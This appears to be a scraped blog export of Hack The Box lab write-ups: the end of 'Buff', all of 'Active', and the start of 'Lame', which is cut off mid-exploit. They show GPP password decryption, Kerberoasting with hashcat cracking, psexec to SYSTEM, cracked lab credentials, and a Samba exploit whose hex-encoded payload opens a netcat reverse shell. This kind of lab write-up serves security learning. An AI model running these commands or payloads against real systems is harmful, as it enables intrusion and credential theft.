C:\\Windows\\system32>whoami\nwhoami\nbuff\\administrator\nC:\\Windows\\system32>cd ../../Users/Administrator/Desktop\ncd ../../Users/Administrator/Desktop\nC:\\Users\\Administrator\\Desktop>cat root.txt\ncat root.txt\n'cat' is not recognized as an internal or external command, operable program or batch file.\nC:\\Users\\Administrator\\Desktop>type root.txt\ntype root.txt\n39c4....c39f\nC:\\Users\\Administrator\\Desktop>powershell\npowershell\nWindows PowerShell\nCopyright (C) Microsoft Corporation. All rights reserved.\nPS C:\\Users\\Administrator\\Desktop> whoami\nwhoami\nbuff\\administrator ","date":"2025-01-12T00:00:00Z","permalink":"https://leopoldabgn.github.io/writeups/p/buff-htb/","title":"HTB | Buff"},{"content":" Machine name: Active, OS: Windows, IP: 10.10.10.100, Difficulty: Easy\nUsers\nSVC_TGS : GPPstillStandingStrong2k18\nAdministrator : Ticketmaster1968\nVersion\nWindows Server 2008 R2 SP1\nEnumeration\nnmap\nnmap -sC -sV -An -p- 10.10.10.100\nStarting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-12 17:12 EST\nNmap scan report for 10.10.10.100\nHost is up (0.027s latency).\nNot shown: 65512 closed tcp ports (reset)\nPORT STATE SERVICE VERSION\n53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)\n| dns-nsid:\n|_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39)\n88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-12-12 22:12:47Z)\n135/tcp open msrpc Microsoft Windows RPC\n139/tcp open netbios-ssn Microsoft Windows netbios-ssn\n389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)\n445/tcp open microsoft-ds?\n464/tcp open kpasswd5? 
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0\n636/tcp open tcpwrapped\n3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)\n3269/tcp open tcpwrapped\n5722/tcp open msrpc Microsoft Windows RPC\n9389/tcp open mc-nmf .NET Message Framing\n47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)\n|_http-title: Not Found\n|_http-server-header: Microsoft-HTTPAPI/2.0\n49152/tcp open msrpc Microsoft Windows RPC\n49153/tcp open msrpc Microsoft Windows RPC\n49154/tcp open msrpc Microsoft Windows RPC\n49155/tcp open msrpc Microsoft Windows RPC\n49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0\n49158/tcp open msrpc Microsoft Windows RPC\n49165/tcp open msrpc Microsoft Windows RPC\n49166/tcp open msrpc Microsoft Windows RPC\n49168/tcp open msrpc Microsoft Windows RPC\nHost script results:\n| smb2-security-mode:\n| 2:1:0:\n|_ Message signing enabled and required\n| smb2-time:\n| date: 2024-12-12T22:13:57\n|_ start_date: 2024-12-12T22:09:06\nenum4linux\n[+] Got OS info for 10.10.10.100 from srvinfo:\n 10.10.10.100 Wk Sv PDC Tim NT Domain Controller\n platform_id : 500\n os version : 6.1\n server type : 0x80102b\n=================================( Share Enumeration on 10.10.10.100 )=================================\ndo_connect: Connection to 10.10.10.100 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)\n Sharename Type Comment\n --------- ---- -------\n ADMIN$ Disk Remote Admin\n C$ Disk Default share\n IPC$ IPC Remote IPC\n NETLOGON Disk Logon server share\n Replication Disk\n SYSVOL Disk Logon server share\n Users Disk\nReconnecting with SMB1 for workgroup listing. 
Unable to connect with SMB1 -- no workgroup available\n[+] Attempting to map shares on 10.10.10.100\n//10.10.10.100/ADMIN$ Mapping: DENIED Listing: N/A Writing: N/A\n//10.10.10.100/C$ Mapping: DENIED Listing: N/A Writing: N/A\n//10.10.10.100/IPC$ Mapping: OK Listing: DENIED Writing: N/A\n//10.10.10.100/NETLOGON Mapping: DENIED Listing: N/A Writing: N/A\n//10.10.10.100/Replication Mapping: OK Listing: OK Writing: N/A\n//10.10.10.100/SYSVOL Mapping: DENIED Listing: N/A Writing: N/A\n//10.10.10.100/Users Mapping: DENIED Listing: N/A Writing: N/A\nFoothold\nSMB Share \"Replication\"\nDigging through the \"Replication\" SMB share, which is accessible as an anonymous user, we find an interesting file among the others:\nGroups.xml\nIt seems to contain an encrypted password.\nChatGPT's explanation:\nThe encrypted password in the cpassword field you are showing is most likely encoded with AES-256-CBC and is part of a Windows Group Policy XML configuration (Group Policy Preferences, or GPP). These cpassword values are generally tied to user account configurations deployed through GPP.\nGPP Exploitation\nWe decrypt the password, which gives us: GPPstillStandingStrong2k18. The associated username is also given in the xml: SVC_TGS\nsmbclient --no-pass //10.10.10.100/Replication\n... 
┌──(kali㉿kali)-[~] └─$ cat Groups.xml \u0026lt;?xml version=\u0026#34;1.0\u0026#34; encoding=\u0026#34;utf-8\u0026#34;?\u0026gt; \u0026lt;Groups clsid=\u0026#34;{3125E937-EB16-4b4c-9934-544FC6D24D26}\u0026#34;\u0026gt;\u0026lt;User clsid=\u0026#34;{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}\u0026#34; name=\u0026#34;active.htb\\SVC_TGS\u0026#34; image=\u0026#34;2\u0026#34; changed=\u0026#34;2018-07-18 20:46:06\u0026#34; uid=\u0026#34;{EF57DA28-5F69-4530-A59E-AAB58578219D}\u0026#34;\u0026gt;\u0026lt;Properties action=\u0026#34;U\u0026#34; newName=\u0026#34;\u0026#34; fullName=\u0026#34;\u0026#34; description=\u0026#34;\u0026#34; cpassword=\u0026#34;edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ\u0026#34; changeLogon=\u0026#34;0\u0026#34; noChange=\u0026#34;1\u0026#34; neverExpires=\u0026#34;1\u0026#34; acctDisabled=\u0026#34;0\u0026#34; userName=\u0026#34;active.htb\\SVC_TGS\u0026#34;/\u0026gt;\u0026lt;/User\u0026gt; \u0026lt;/Groups\u0026gt; ┌──(kali㉿kali)-[~] └─$ gpp-decrypt \u0026#34;edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ\u0026#34; GPPstillStandingStrong2k18 user flag - SMB Share Users En scannat a nouveau les shares SMB, cette fois-ci avec notre user/password obtenu, on voit qu\u0026rsquo;on a acces au share \u0026ldquo;Users\u0026rdquo; en readonly. On y trouve un dossier avec le nom de notre utilisateur et tous ces fichiers Windows, avec le flag user.txt :\n1fc4\u0026hellip;..a676\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 ┌──(kali㉿kali)-[~/htb/Active/bloodhound1] └─$ smbclient //10.10.10.100/Users -U \u0026#39;SVC_TGS%GPPstillStandingStrong2k18\u0026#39; Try \u0026#34;help\u0026#34; to get a list of possible commands. smb: \\\u0026gt; ls . DR 0 Sat Jul 21 10:39:20 2018 .. 
DR 0 Sat Jul 21 10:39:20 2018 Administrator D 0 Mon Jul 16 06:14:21 2018 All Users DHSrn 0 Tue Jul 14 01:06:44 2009 Default DHR 0 Tue Jul 14 02:38:21 2009 Default User DHSrn 0 Tue Jul 14 01:06:44 2009 desktop.ini AHS 174 Tue Jul 14 00:57:55 2009 Public DR 0 Tue Jul 14 00:57:55 2009 SVC_TGS D 0 Sat Jul 21 11:16:32 2018 5217023 blocks of size 4096. 278586 blocks available smb: \\> cd SVC_TGS\\ smb: \\SVC_TGS\\> ls . D 0 Sat Jul 21 11:16:32 2018 .. D 0 Sat Jul 21 11:16:32 2018 Contacts D 0 Sat Jul 21 11:14:11 2018 Desktop D 0 Sat Jul 21 11:14:42 2018 Downloads D 0 Sat Jul 21 11:14:23 2018 Favorites D 0 Sat Jul 21 11:14:44 2018 Links D 0 Sat Jul 21 11:14:57 2018 My Documents D 0 Sat Jul 21 11:15:03 2018 My Music D 0 Sat Jul 21 11:15:32 2018 My Pictures D 0 Sat Jul 21 11:15:43 2018 My Videos D 0 Sat Jul 21 11:15:53 2018 Saved Games D 0 Sat Jul 21 11:16:12 2018 Searches D 0 Sat Jul 21 11:16:24 2018 5217023 blocks of size 4096. 278586 blocks available ┌──(kali㉿kali)-[~/htb/Active/bloodhound1] └─$ sudo mount -t cifs -o username='SVC_TGS',password='GPPstillStandingStrong2k18' //10.10.10.100/Users/SVC_TGS /mnt/smb ┌──(kali㉿kali)-[~/htb/Active/bloodhound1] └─$ xdg-open /mnt/smb\nPrivilege Escalation\nKerberoasting Attack on SPN ‘CIFS’\nThis command runs the GetUserSPNs.py tool from the Impacket suite to retrieve the Service Principal Names (SPNs) configured in Active Directory that are tied to service accounts. 
Here we check whether there is an SPN that could be abused to carry out a Kerberoasting attack.\n$ impacket-GetUserSPNs active.htb/SVC_TGS:\"GPPstillStandingStrong2k18\" -dc-ip 10.10.10.100 Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation -------------------- ------------- -------------------------------------------------------- -------------------------- -------------------------- ---------- active/CIFS:445 Administrator CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb 2018-07-18 15:06:40.351723 2025-01-04 07:30:15.825757\nThe -request option requests a TGS (Ticket Granting Service) ticket for the SPNs found. This ticket is then extracted as a Kerberos hash, which can be cracked offline.\n$ impacket-GetUserSPNs active.htb/SVC_TGS:\"GPPstillStandingStrong2k18\" -request -dc-ip 10.10.10.100 Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation -------------------- ------------- -------------------------------------------------------- -------------------------- -------------------------- ---------- active/CIFS:445 Administrator CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb 2018-07-18 15:06:40.351723 2025-01-04 07:30:15.825757 [-] CCache file is not found. Skipping... 
$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$8852493078c2a4f352f6468b34dcd243$...\nThis result is the TGS hash retrieved for the Administrator account.\n» vim admin_hash.txt » hashcat -m 13100 -a 0 admin_hash.txt ~/wordlists/rockyou.txt hashcat (v6.2.5) starting Dictionary cache hit: * Filename..: /home/leopold/wordlists/rockyou.txt * Passwords.: 14344385 * Bytes.....: 139922195 * Keyspace..: 14344385 $krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$8852493078c2a4f352f6468b34dcd243$...:Ticketmaster1968 Session..........: hashcat Status...........: Cracked Hash.Mode........: 13100 (Kerberos 5, etype 23, TGS-REP) Hash.Target......: $krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Ad...0cae47 Time.Started.....: Sun Jan 5 01:39:10 2025 (1 sec) Time.Estimated...: Sun Jan 5 01:39:11 2025 (0 secs) Kernel.Feature...: Pure Kernel Guess.Base.......: File (/home/leopold/wordlists/rockyou.txt) Guess.Queue......: 1/1 (100.00%) Speed.#1.........: 7678.4 kH/s (9.15ms) @ Accel:1024 Loops:1 Thr:32 Vec:1 Recovered........: 1/1 (100.00%) Digests Progress.........: 10616832/14344385 (74.01%) Rejected.........: 0/10616832 (0.00%) Restore.Point....: 10321920/14344385 (71.96%) Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1 Candidate.Engine.: Device Generator Candidates.#1....: ahki_22 -> Saboka54 Hardware.Mon.#1..: Temp: 36c Fan: 46% Util: 23% Core:1860MHz Mem:3802MHz Bus:16 Started: Sun Jan 5 01:39:09 2025 Stopped: Sun Jan 5 01:39:12 2025\nWe find the administrator's password! Administrator:Ticketmaster1968\nWe can now connect over SMB and access the administrator's folder in the “Users” share, which was blocked before. 
We do get the root.txt flag.\n$ smbclient //10.10.10.100/Users -U 'Administrator%Ticketmaster1968' Try \"help\" to get a list of possible commands. smb: \\> cd Administrator\\ smb: \\Administrator\\> ls . D 0 Mon Jul 16 06:14:21 2018 .. D 0 Mon Jul 16 06:14:21 2018 AppData DHn 0 Sat Jan 4 07:29:39 2025 Application Data DHSrn 0 Mon Jul 16 06:14:15 2018 Contacts DR 0 Mon Jul 30 09:50:10 2018 Cookies DHSrn 0 Mon Jul 16 06:14:15 2018 Desktop DR 0 Thu Jan 21 11:49:47 2021 Documents DR 0 Mon Jul 30 09:50:10 2018 Downloads DR 0 Thu Jan 21 11:52:32 2021 Favorites DR 0 Mon Jul 30 09:50:10 2018 Links DR 0 Mon Jul 30 09:50:10 2018 Local Settings DHSrn 0 Mon Jul 16 06:14:15 2018 Music DR 0 Mon Jul 30 09:50:10 2018 My Documents DHSrn 0 Mon Jul 16 06:14:15 2018 NetHood DHSrn 0 Mon Jul 16 06:14:15 2018 NTUSER.DAT AHSn 524288 Sat Jan 4 07:30:15 2025 ntuser.dat.LOG1 AHS 262144 Sat Jan 4 08:05:30 2025 ntuser.dat.LOG2 AHS 0 Mon Jul 16 06:14:09 2018 NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf AHS 65536 Mon Jul 16 06:14:15 2018 NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms AHS 524288 Mon Jul 16 06:14:15 2018 NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms AHS 524288 Mon Jul 16 06:14:15 2018 ntuser.ini HS 20 Mon Jul 16 06:14:15 2018 Pictures DR 0 Mon Jul 30 09:50:10 2018 PrintHood DHSrn 0 Mon Jul 16 06:14:15 2018 Recent DHSrn 0 Mon Jul 16 06:14:15 2018 Saved Games DR 0 Mon Jul 30 09:50:10 2018 Searches DR 0 Mon Jul 30 09:50:10 2018 SendTo DHSrn 0 Mon Jul 16 06:14:15 2018 Start Menu DHSrn 0 Mon Jul 16 06:14:15 2018 Templates DHSrn 0 Mon Jul 16 06:14:15 2018 Videos DR 0 Mon Jul 30 09:50:10 2018 5217023 blocks of size 4096. 
277230 blocks available smb: \\Administrator\\> cd Desktop smb: \\Administrator\\Desktop\\> cat root.txt cat: command not found smb: \\Administrator\\Desktop\\> get root.txt getting file \\Administrator\\Desktop\\root.txt of size 34 as root.txt (0.5 KiloBytes/sec) (average 0.5 KiloBytes/sec) smb: \\Administrator\\Desktop\\> ┌──(kali㉿kali)-[~/htb/Active/bloodhound2] └─$ cat root.txt 5d2a.....fb20\nAdministrator shell\nUsing the psexec.py tool from the Impacket suite, I was able to obtain an interactive shell with the highest privileges (NT AUTHORITY\\SYSTEM) on the target machine. This was possible by using the Administrator user's credentials to connect to the ADMIN$ SMB share, upload a temporary executable, and create a Windows service to run it. Once the service started, full access to the system was established, giving complete control of the machine.\n$ impacket-psexec Administrator:\"Ticketmaster1968\"@10.10.10.100 Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies [*] Requesting shares on 10.10.10.100..... [*] Found writable share ADMIN$ [*] Uploading file lwoxkZvR.exe [*] Opening SVCManager on 10.10.10.100..... [*] Creating service zfLo on 10.10.10.100..... [*] Starting service zfLo..... [!] Press help for extra shell commands Microsoft Windows [Version 6.1.7601] Copyright (c) 2009 Microsoft Corporation. All rights reserved. 
C:\\Windows\\system32> whoami nt authority\\system ","date":"2025-01-05T00:00:00Z","permalink":"https://leopoldabgn.github.io/writeups/p/active-htb/","title":"HTB | Active"},{"content":" Machine name: Lame, OS: Linux, IP: 10.10.10.3, Difficulty: Easy\nEnumeration\nnmap\n$ nmap -vvv -sC -sV -An -p- 10.10.10.3 -Pn PORT STATE SERVICE REASON VERSION 21/tcp open ftp syn-ack vsftpd 2.3.4 |_ftp-anon: Anonymous FTP login allowed (FTP code 230) | ftp-syst: | STAT: | FTP server status: | Connected to 10.10.16.11 | Logged in as ftp | TYPE: ASCII | No session bandwidth limit | Session timeout in seconds is 300 | Control connection is plain text | Data connections will be plain text | vsFTPd 2.3.4 - secure, fast, stable |_End of status 22/tcp open ssh syn-ack OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0) | ssh-hostkey: | 1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA) |_ 2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA) 139/tcp open netbios-ssn syn-ack Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 445/tcp open netbios-ssn syn-ack Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 3632/tcp open distccd syn-ack distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4)) Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel Host script results: |_ms-sql-info: ERROR: Script execution failed (use -d to debug) | p2p-conficker: | Checking for Conficker.C or higher... 
| Check 1 (port 59488/tcp): CLEAN (Timeout) | Check 2 (port 46758/tcp): CLEAN (Timeout) | Check 3 (port 14597/udp): CLEAN (Timeout) | Check 4 (port 40169/udp): CLEAN (Timeout) |_ 0/4 checks are positive: Host is CLEAN or ports are blocked |_smb-os-discovery: ERROR: Script execution failed (use -d to debug) |_smb-security-mode: ERROR: Script execution failed (use -d to debug) |_smb2-security-mode: Couldn't establish a SMBv2 connection. |_smb2-time: Protocol negotiation failed (SMB2)\nenum4linux\n$ enum4linux 10.10.10.3 Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Tue Dec 17 17:01:25 2024 =========================================( Target Information )========================================= Target ........... 10.10.10.3 RID Range ........ 500-550,1000-1050 Username ......... '' Password ......... '' Known Usernames .. 
administrator, guest, krbtgt, domain admins, root, bin, none =============================( Enumerating Workgroup/Domain on 10.10.10.3 )============================= [E] Can't find workgroup/domain =================================( Nbtstat Information for 10.10.10.3 )================================= Looking up status of 10.10.10.3 No reply from 10.10.10.3 ====================================( Session Check on 10.10.10.3 )==================================== [+] Server 10.10.10.3 allows sessions using username '', password '' =================================( Getting domain SID for 10.10.10.3 )================================= Domain Name: WORKGROUP Domain Sid: (NULL SID) [+] Can't determine if host is part of domain or part of a workgroup ====================================( OS information on 10.10.10.3 )==================================== [E] Can't get OS info with smbclient [+] Got OS info for 10.10.10.3 from srvinfo: LAME Wk Sv PrQ Unx NT SNT lame server (Samba 3.0.20-Debian) platform_id : 500 os version : 4.9 server type : 0x9a03 ========================================( Users on 10.10.10.3 )======================================== index: 0x1 RID: 0x3f2 acb: 0x00000011 Account: games Name: games Desc: (null) index: 0x2 RID: 0x1f5 acb: 0x00000011 Account: nobody Name: nobody Desc: (null) index: 0x3 RID: 0x4ba acb: 0x00000011 Account: bind Name: (null) Desc: (null) index: 0x4 RID: 0x402 acb: 0x00000011 Account: proxy Name: proxy Desc: (null) index: 0x5 RID: 0x4b4 acb: 0x00000011 Account: syslog Name: (null) Desc: (null) index: 0x6 RID: 0xbba acb: 0x00000010 Account: user Name: just a user,111,, Desc: (null) index: 0x7 RID: 0x42a acb: 0x00000011 Account: www-data Name: www-data Desc: (null) index: 0x8 RID: 0x3e8 acb: 0x00000011 Account: root Name: root Desc: (null) index: 0x9 RID: 0x3fa acb: 0x00000011 Account: news Name: news Desc: (null) index: 0xa RID: 0x4c0 acb: 0x00000011 Account: postgres 
Name: PostgreSQL administrator,,, Desc: (null) index: 0xb RID: 0x3ec acb: 0x00000011 Account: bin Name: bin Desc: (null) index: 0xc RID: 0x3f8 acb: 0x00000011 Account: mail Name: mail Desc: (null) index: 0xd RID: 0x4c6 acb: 0x00000011 Account: distccd Name: (null) Desc: (null) index: 0xe RID: 0x4ca acb: 0x00000011 Account: proftpd Name: (null) Desc: (null) index: 0xf RID: 0x4b2 acb: 0x00000011 Account: dhcp Name: (null) Desc: (null) index: 0x10 RID: 0x3ea acb: 0x00000011 Account: daemon Name: daemon Desc: (null) index: 0x11 RID: 0x4b8 acb: 0x00000011 Account: sshd Name: (null) Desc: (null) index: 0x12 RID: 0x3f4 acb: 0x00000011 Account: man Name: man Desc: (null) index: 0x13 RID: 0x3f6 acb: 0x00000011 Account: lp Name: lp Desc: (null) index: 0x14 RID: 0x4c2 acb: 0x00000011 Account: mysql Name: MySQL Server,,, Desc: (null) index: 0x15 RID: 0x43a acb: 0x00000011 Account: gnats Name: Gnats Bug-Reporting System (admin) Desc: (null) index: 0x16 RID: 0x4b0 acb: 0x00000011 Account: libuuid Name: (null) Desc: (null) index: 0x17 RID: 0x42c acb: 0x00000011 Account: backup Name: backup Desc: (null) index: 0x18 RID: 0xbb8 acb: 0x00000010 Account: msfadmin Name: msfadmin,,, Desc: (null) index: 0x19 RID: 0x4c8 acb: 0x00000011 Account: telnetd Name: (null) Desc: (null) index: 0x1a RID: 0x3ee acb: 0x00000011 Account: sys Name: sys Desc: (null) index: 0x1b RID: 0x4b6 acb: 0x00000011 Account: klog Name: (null) Desc: (null) index: 0x1c RID: 0x4bc acb: 0x00000011 Account: postfix Name: (null) Desc: (null) index: 0x1d RID: 0xbbc acb: 0x00000011 Account: service Name: ,,, Desc: (null) index: 0x1e RID: 0x434 acb: 0x00000011 Account: list Name: Mailing List Manager Desc: (null) index: 0x1f RID: 0x436 acb: 0x00000011 Account: irc Name: ircd Desc: (null) index: 0x20 RID: 0x4be acb: 0x00000011 Account: ftp Name: (null) Desc: (null) index: 0x21 RID: 0x4c4 acb: 0x00000011 Account: tomcat55 Name: (null) Desc: (null) index: 0x22 RID: 0x3f0 acb: 0x00000011 Account: sync Name: sync Desc: (null) 
index: 0x23 RID: 0x3fc acb: 0x00000011 Account: uucp Name: uucp Desc: (null) user:[games] rid:[0x3f2] user:[nobody] rid:[0x1f5] user:[bind] rid:[0x4ba] user:[proxy] rid:[0x402] user:[syslog] rid:[0x4b4] user:[user] rid:[0xbba] user:[www-data] rid:[0x42a] user:[root] rid:[0x3e8] user:[news] rid:[0x3fa] user:[postgres] rid:[0x4c0] user:[bin] rid:[0x3ec] user:[mail] rid:[0x3f8] user:[distccd] rid:[0x4c6] user:[proftpd] rid:[0x4ca] user:[dhcp] rid:[0x4b2] user:[daemon] rid:[0x3ea] user:[sshd] rid:[0x4b8] user:[man] rid:[0x3f4] user:[lp] rid:[0x3f6] user:[mysql] rid:[0x4c2] user:[gnats] rid:[0x43a] user:[libuuid] rid:[0x4b0] user:[backup] rid:[0x42c] user:[msfadmin] rid:[0xbb8] user:[telnetd] rid:[0x4c8] user:[sys] rid:[0x3ee] user:[klog] rid:[0x4b6] user:[postfix] rid:[0x4bc] user:[service] rid:[0xbbc] user:[list] rid:[0x434] user:[irc] rid:[0x436] user:[ftp] rid:[0x4be] user:[tomcat55] rid:[0x4c4] user:[sync] rid:[0x3f0] user:[uucp] rid:[0x3fc] ==================================( Share Enumeration on 10.10.10.3 )================================== Sharename Type Comment --------- ---- ------- print$ Disk Printer Drivers tmp Disk oh noes! opt Disk IPC$ IPC IPC Service (lame server (Samba 3.0.20-Debian)) ADMIN$ IPC IPC Service (lame server (Samba 3.0.20-Debian)) Reconnecting with SMB1 for workgroup listing. 
Server Comment --------- ------- Workgroup Master --------- ------- WORKGROUP LAME [+] Attempting to map shares on 10.10.10.3 //10.10.10.3/print$ Mapping: DENIED Listing: N/A Writing: N/A //10.10.10.3/tmp Mapping: OK Listing: OK Writing: N/A //10.10.10.3/opt Mapping: DENIED Listing: N/A Writing: N/A [E] Can't understand response: NT_STATUS_NETWORK_ACCESS_DENIED listing \\* //10.10.10.3/IPC$ Mapping: N/A Listing: N/A Writing: N/A //10.10.10.3/ADMIN$ Mapping: DENIED Listing: N/A Writing: N/A =============================( Password Policy Information for 10.10.10.3 )============================= [+] Attaching to 10.10.10.3 using a NULL share [+] Trying protocol 139/SMB... [+] Found domain(s): [+] LAME [+] Builtin [+] Password Info for Domain: LAME [+] Minimum password length: 5 [+] Password history length: None [+] Maximum password age: Not Set [+] Password Complexity Flags: 000000 [+] Domain Refuse Password Change: 0 [+] Domain Password Store Cleartext: 0 [+] Domain Password Lockout Admins: 0 [+] Domain Password No Clear Change: 0 [+] Domain Password No Anon Change: 0 [+] Domain Password Complex: 0 [+] Minimum password age: None [+] Reset Account Lockout Counter: 30 minutes [+] Locked Account Duration: 30 minutes [+] Account Lockout Threshold: None [+] Forced Log off Time: Not Set [+] Retieved partial password policy with rpcclient: Password Complexity: Disabled Minimum Password Length: 0 ========================================( Groups on 10.10.10.3 )======================================== [+] Getting builtin groups: [+] Getting builtin group memberships: [+] Getting local groups: [+] Getting local group memberships: [+] Getting domain groups: [+] Getting domain group memberships: ===================( Users on 10.10.10.3 via RID cycling (RIDS: 500-550,1000-1050) )=================== [I] Found new SID: S-1-5-21-2446995257-2525374255-2673161615 [+] Enumerating users using SID S-1-5-21-2446995257-2525374255-2673161615 and logon username '', 
password '' S-1-5-21-2446995257-2525374255-2673161615-500 LAME\\Administrator (Local User) S-1-5-21-2446995257-2525374255-2673161615-501 LAME\\nobody (Local User) S-1-5-21-2446995257-2525374255-2673161615-512 LAME\\Domain Admins (Domain Group) S-1-5-21-2446995257-2525374255-2673161615-513 LAME\\Domain Users (Domain Group) S-1-5-21-2446995257-2525374255-2673161615-514 LAME\\Domain Guests (Domain Group) S-1-5-21-2446995257-2525374255-2673161615-1000 LAME\\root (Local User) S-1-5-21-2446995257-2525374255-2673161615-1001 LAME\\root (Domain Group) S-1-5-21-2446995257-2525374255-2673161615-1002 LAME\\daemon (Local User) S-1-5-21-2446995257-2525374255-2673161615-1003 LAME\\daemon (Domain Group) S-1-5-21-2446995257-2525374255-2673161615-1004 LAME\\bin (Local User) S-1-5-21-2446995257-2525374255-2673161615-1005 LAME\\bin (Domain Group) S-1-5-21-2446995257-2525374255-2673161615-1006 LAME\\sys (Local User) S-1-5-21-2446995257-2525374255-2673161615-1007 LAME\\sys (Domain Group) S-1-5-21-2446995257-2525374255-2673161615-1008 LAME\\sync (Local User) S-1-5-21-2446995257-2525374255-2673161615-1009 LAME\\adm (Domain Group) S-1-5-21-2446995257-2525374255-2673161615-1010 LAME\\games (Local User) S-1-5-21-2446995257-2525374255-2673161615-1011 LAME\\tty (Domain Group) S-1-5-21-2446995257-2525374255-2673161615-1012 LAME\\man (Local User) S-1-5-21-2446995257-2525374255-2673161615-1013 LAME\\disk (Domain Group) S-1-5-21-2446995257-2525374255-2673161615-1014 LAME\\lp (Local User) S-1-5-21-2446995257-2525374255-2673161615-1015 LAME\\lp (Domain Group) S-1-5-21-2446995257-2525374255-2673161615-1016 LAME\\mail (Local User) S-1-5-21-2446995257-2525374255-2673161615-1017 LAME\\mail (Domain Group) S-1-5-21-2446995257-2525374255-2673161615-1018 LAME\\news (Local User) S-1-5-21-2446995257-2525374255-2673161615-1019 LAME\\news (Domain Group) S-1-5-21-2446995257-2525374255-2673161615-1020 LAME\\uucp (Local User) S-1-5-21-2446995257-2525374255-2673161615-1021 LAME\\uucp (Domain 
Group) S-1-5-21-2446995257-2525374255-2673161615-1025 LAME\\man (Domain Group) S-1-5-21-2446995257-2525374255-2673161615-1026 LAME\\proxy (Local User) S-1-5-21-2446995257-2525374255-2673161615-1027 LAME\\proxy (Domain Group) S-1-5-21-2446995257-2525374255-2673161615-1031 LAME\\kmem (Domain Group) S-1-5-21-2446995257-2525374255-2673161615-1041 LAME\\dialout (Domain Group) S-1-5-21-2446995257-2525374255-2673161615-1043 LAME\\fax (Domain Group) S-1-5-21-2446995257-2525374255-2673161615-1045 LAME\\voice (Domain Group) S-1-5-21-2446995257-2525374255-2673161615-1049 LAME\\cdrom (Domain Group) ================================( Getting printer info for 10.10.10.3 )================================ No printers returned. enum4linux complete on Tue Dec 17 17:02:53 2024\nExploitation\nSamba smbd 3.0.20-Debian\n$ cat exploit.py\n#!/usr/bin/python3\n# exploit Samba smbd 3.0.20-Debian\nfrom smb import *\nfrom smb.SMBConnection import *\n# msfvenom -p cmd/unix/reverse_netcat LHOST=10.10.16.11 LPORT=1337 -f python\nbuf = b\"\"\nbuf += b\"\\x6d\\x6b\\x66\\x69\\x66\\x6f\\x20\\x2f\\x74\\x6d\\x70\\x2f\"\nbuf += b\"\\x6d\\x69\\x66\\x75\\x63\\x3b\\x20\\x6e\\x63\\x20\\x31\\x30\"\nbuf += b\"\\x2e\\x31\\x30\\x2e\\x31\\x36\\x2e\\x31\\x31\\x20\\x31\\x33\"\nbuf += b\"\\x33\\x37\\x20\\x30\\x3c\\x2f\\x74\\x6d\\x70\\x2f\\x6d\\x69\"\nbuf += b\"\\x66\\x75\\x63\\x20\\x7c\\x20\\x2f\\x62\\x69\\x6e\\x2f\\x73\"\nbuf += b\"\\x68\\x20\\x3e\\x2f\\x74\\x6d\\x70\\x2f\\x6d\\x69\\x66\\x75\"\nbuf += b\"\\x63\\x20\\x32\\x3e\\x26\\x31\\x3b\\x20\\x72\\x6d\\x20\\x2f\"\nbuf += b\"\\x74\\x6d\\x70\\x2f\\x6d\\x69\\x66\\x75\\x63\"\nuserID = \"/=` nohup \" + buf.decode('utf-8') + \"`\"\npassword = 'password'\nvictim_ip = 
